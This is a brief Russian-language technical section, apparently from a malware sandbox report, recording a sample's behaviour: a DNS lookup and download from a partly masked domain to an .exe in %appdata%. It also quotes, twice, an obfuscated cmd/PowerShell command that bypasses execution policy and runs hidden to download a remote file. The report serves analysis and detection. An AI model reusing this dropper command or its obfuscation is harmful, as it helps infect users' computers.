Техническая информация
- http://lt##.#sianetwork.pl/file/hon.vfr как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OW^er^sHeLL^.eXE -^ExeC^UTIoNp^oLI^cY^ B^Y^PASS^ -n^oP^ro^FI^Le^ ^-wIndO^wS^t^y^le Hid^D^En (^nE^w^-o^bj^Ect^ SYST^E^m.^n^et.W^eBCLi^ent^).dowN^lOADF^iLe('http://lt##.#s...
- DNS ASK lt##.#sianetwork.pl
- '<SYSTEM32>\cmd.exe' /c "p^OW^er^sHeLL^.eXE -^ExeC^UTIoNp^oLI^cY^ B^Y^PASS^ -n^oP^ro^FI^Le^ ^-wIndO^wS^t^y^le Hid^D^En (^nE^w^-o^bj^Ect^ SYST^E^m.^n^et.W^eBCLi^ent^).dowN^lOADF^iLe('http://lt##.#s...' (со скрытым окном)